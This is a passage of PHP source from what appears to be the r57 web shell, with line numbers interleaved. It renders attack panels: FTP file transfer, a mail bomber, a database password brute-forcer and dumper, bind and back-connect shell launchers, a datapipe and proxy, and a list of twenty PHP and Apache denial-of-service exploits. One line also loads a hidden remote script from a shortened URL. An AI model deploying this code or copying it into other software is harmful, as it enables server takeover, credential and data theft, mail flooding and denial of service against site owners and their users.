echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1']));
6863
6864
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
6865
6866
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
6867
6868
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
6869
6870
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
6871
6872
echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
6873
6874
echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
6875
6876
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
6877
6878
echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
6879
6880
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
6881
6882
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
6883
6884
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
6885
6886
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
6887
6888
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
6889
6890
echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
6891
6892
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
6893
6894
echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
6895
6896
echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
6897
6898
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
6899
6900
echo $te."</td>".$fe."</tr></div></table>";
6901
6902
}
6903
6904
if(@function_exists("mail")){
6905
6906
echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
6907
6908
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
6909
6910
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):(""))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
6911
6912
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):(""))));
6913
6914
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):(""))));
6915
6916
echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
6917
6918
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
6919
6920
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
6921
6922
echo "<SCRIPT SRC=http://goo.gl/ZibW9L></SCRIPT> <font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
6923
6924
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):(""))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
6925
6926
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):(""))));
6927
6928
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):(""))));
6929
6930
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir));
6931
6932
echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
6933
6934
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
6935
6936
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
6937
6938
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>";
6939
6940
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir));
6941
6942
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
6943
6944
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
6945
6946
echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>');
6947
6948
echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10)));
6949
6950
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
6951
6952
echo $te."</td>".$fe."</tr></div></table>";
6953
6954
}
6955
6956
if($mysql_on||$mssql_on||$pg_on||$ora_on)
6957
6958
{
6959
6960
$select = '<select name=db>';
6961
6962
if($mysql_on) $select .= '<option>MySQL</option>';
6963
6964
if($mssql_on) $select .= '<option>MSSQL</option>';
6965
6966
if($pg_on)    $select .= '<option>PostgreSQL</option>';
6967
6968
if($ora_on)   $select .= '<option>Oracle</option>';
6969
6970
$select .= '</select>';
6971
6972
echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up2.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
6973
6974
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>";
6975
6976
echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute'));
6977
6978
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
6979
6980
echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
6981
6982
echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
6983
6984
echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
6985
6986
echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
6987
6988
echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
6989
6990
echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passw.dic'))));
6991
6992
echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1']));
6993
6994
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
6995
6996
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
6997
6998
echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
6999
7000
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
7001
7002
echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
7003
7004
echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
7005
7006
echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
7007
7008
echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
7009
7010
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7011
7012
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
7013
7014
echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
7015
7016
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
7017
7018
echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
7019
7020
echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
7021
7022
echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
7023
7024
echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>";
7025
7026
echo "</td>".$fe."</tr></div></table>";
7027
7028
}
7029
7030
if(!$safe_mode &&$unix){
7031
7032
echo $table_up1.div_title($lang[$language.'_text81'],'id37').$table_up2.div('id37').$ts."<tr>".$fs."<td valign=top width=25%>".$ts;
7033
7034
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
7035
7036
echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457'));
7037
7038
echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57'));
7039
7040
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
7041
7042
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
7043
7044
echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
7045
7046
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
7047
7048
echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ?(getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
7049
7050
echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
7051
7052
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
7053
7054
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
7055
7056
echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
7057
7058
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
7059
7060
echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457'));
7061
7062
echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru'));
7063
7064
echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667'));
7065
7066
echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
7067
7068
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
7069
7070
echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
7071
7072
echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";
7073
7074
echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337'));
7075
7076
echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
7077
7078
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
7079
7080
echo $te."</td>".$fe."</tr></div></table>";
7081
7082
}
7083
7084
echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=50%>".$ts;
7085
7086
echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7087
7088
echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe);
7089
7090
echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit exhaustion in [ pack() ] function').$fe);
7091
7092
echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF in [ unserialize() ] function').$fe);
7093
7094
echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'Limit integer calculate (65535) in ZendEngine').$fe);
7095
7096
echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [ dl() ] vulnerability').$fe);
7097
7098
echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [ preg_match() ] exhaustion resources (PHP <5.2.1)').$fe);
7099
7100
echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Memory_limit exhaustion in [ str_repeat() ] function (PHP <4.4.5,5.2.1)').$fe);
7101
7102
echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe);
7103
7104
echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload inodes from HD.I via [ tempnam() ] (PHP 4.4.2, 5.1.2)').$fe);
7105
7106
echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF in [ wordwrap() ] function (PHP <4.4.2,5.1.2)').$fe);
7107
7108
echo $te."</td><td valign=top width=50%>".$ts;
7109
7110
echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7111
7112
echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF in [ array_fill() ] function (PHP <4.4.2,5.1.2)').$fe);
7113
7114
echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF in [ substr_compare() ] function (PHP <4.4.2,5.1.2)').$fe);
7115
7116
echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Array Creation in [ unserialize() ] 64 bit function (PHP <5.2.1)').$fe);
7117
7118
echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF in [ str_ireplace() ] function (PHP <5.2.x)').$fe);
7119
7120
echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF in [ htmlentities() ] function (PHP <5.1.6,4.4.4)').$fe);
7121
7122
echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'Integer Overflow in [ zip_entry_read() ] function (PHP <4.4.5)').$fe);
7123
7124
echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF in [ sqlite_udf_decode_binary() ] function (PHP <4.4.5,5.2.1)').$fe);
7125
7126
echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'Memory Allocation BoF in [ msg_receive() ] function (PHP <4.4.5,5.2.1)').$fe);
7127
7128
echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'Off By One in [ php_stream_filter_create() ] function (PHP 5<5.2.1)').$fe);
7129
7130
echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'Reference Counter Overflow in [ unserialize() ] function (PHP <4.4.4)').$fe);
7131
7132
echo $te."</td></tr></div></table>";
7133
7134
?>